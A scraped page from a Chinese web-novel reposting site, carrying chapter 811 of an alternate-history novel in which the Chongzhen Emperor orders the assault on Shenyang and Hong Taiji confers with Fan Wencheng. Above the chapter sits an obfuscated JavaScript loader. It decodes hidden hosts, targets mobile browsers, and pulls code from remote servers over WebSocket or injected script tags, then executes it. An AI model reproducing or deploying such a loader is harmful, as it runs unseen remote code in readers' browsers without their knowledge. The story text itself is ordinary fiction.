笔趣阁

字:
关灯 护眼
笔趣阁 > 明朝那些事儿 > 第811章 攻城对射
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第811章 攻城对射

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
两拨人各有各的理由,一个说就在险地,耗时良久,空耗国库,恐有不测,一个说鲁莽进军,伤亡太大,谨防翻盘。
  反正是各说各有理,最终两拨人齐齐停下嘴,看着朱由检道,“请陛下决断。”
  他们虽说都有各自的顾虑,但真正做出决断的,还是皇帝陛下。当然,也是因为两种策略都可行,没有明显的差别,不然的话,他们不会轻易将决策权让出去。
  军营大帐中,朱由检高坐主位,他的下方,则是一列列的将军,满桂、曹文昭、赵率教、曹变蛟、黄得功、秦良玉、张贤......所有人虽然表情不同,但却都沉稳闲适,没有一丝焦躁不安的情绪。
  不论皇帝做出何种选择,对他们来说都没有区别,连续几个月的对峙和战斗,让他们的自信强烈到了极点,面对满清,只要他们自己不犯错,那是绝对不可能输的,无论怎么打,结果都一样,只是过程不同而已。
  看着他们,朱由检感慨不已,要说他对大明的改变,当然是有的,但最大的改变,还在于他眼前这一批人,他们的命运和历史截然不同,而他们命运的变化,就带来了眼前这场历史上不存在的战争。
  想到这,他不禁有些得意,也有些感慨,历史,真的被他改变了。
  “既然你们无法说服对方,那就以朕的决断为准吧!”朱由检慢慢道,他的眼前,不禁浮现了一个女子的脸庞,那是田秀英,此刻,想必他的身材已经开始胖起来了吧。
  想着,他的心不知不觉间多出了一股柔情,不仅是对田秀英的,还是对那未出世的孩子,他想回去见证他的出生。
  “朕决定,提早发动进攻,攻破沈阳,活捉黄太吉。”朱由检最后掷地有声道。
  “攻破沈阳,活捉黄太吉!”
  诸将一愣,随后一起高喝起来,声音传递到帐外,守卫的卫兵们顿觉豪气干云,放开嗓子吼起来,随后整个军营都被感染起来,所有士兵都齐齐高喝,声震云霄。
  “攻破沈阳,活捉活捉黄太吉!!!”
  巨大的声音传到三公里外的沈阳城,让城头的女真士兵听闻后,顿时脸色大变,一时间,整个沈阳城都开始慌乱起来,城内更是响起了‘沈阳破,太吉死,女真亡’的谣言。
  城内大乱,流民四起!
  随后,八旗兵四处,大杀特杀,总算是将混乱给镇压下去,然而,各种表象是可以强压下去,但是人心却散了。
  不光是底层的百姓,就连女真高层也是如此,各个旗主贝勒想要求见黄太吉问个对策,但是却只得到一个答案。
  “大汗累了,正在休息。”
  有人摇头离去,有人叹息不已,有人皱眉凝思,甚至还有人破口大骂。然而,被回答正在休息的黄太吉,此刻正孤独的站在崇政殿门口,看着远方的天空,不知道在想些什么。
  他身边并没有任何乙方高层,唯一跟着的,就是被他引为心腹的范文程。两人都没有说话,就这么站着,默默无言。
  “范先生可知女真的来源?”良久,黄太吉终于开口道,然而刚说完,他就自己打住了问话,“呵呵,是本汗白问了,先生饱读诗书,焉能不知道女真之来源。”
  “父汗起事之处,国号曰金,承袭的就是前朝大金之名,完颜氏开我女真之霸业,父汗取此国号,意思就是不忘先辈之功绩。”
  “我自登基后,也一直是以此为座右铭,不敢或忘,然而.....”说着,他不免苦涩的笑起来,“看看外面这混乱喧嚣,先生以为,我大清还有多久?”
  “大清国祚绵长,当在三百载以上!”黄太吉一脸的颓唐,然而范文程却满脸的自信,目光开阖之间,神采奕奕。
  那种自信的模样,让黄太吉浑身一震,他豁然转身,紧紧盯着范文程,惊喜莫名的问道,“先生可有破局之策?”
  “大汗既然知道曾经完颜氏金国的起家之历史,当知道,在金之前,占据此地的,乃是另一个朝代。”范文程跺了跺脚下的城池道。
  “另一个朝代?”黄太吉一皱眉,然后仔细思索起来,随后抬起头,慢慢道,“先生说的,可是辽国?”
  “没错,正是辽国,完颜起兵,推翻大辽,所以才有金国国祚。”范文程寥寥几笔带过,这本就不是他想说的,他想说的,是前代的辽国。
  看着黄太吉,他本想卖个关子,但见对方一点都没有配合的意思,满脸也是迷茫不已,压根不了解这段历史,心中顿时熄了那点想法,干脆直接道:“当日辽国末路,其情形也是和如今沈阳这般,混乱不堪,大将拥兵自重,不思进取。”
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师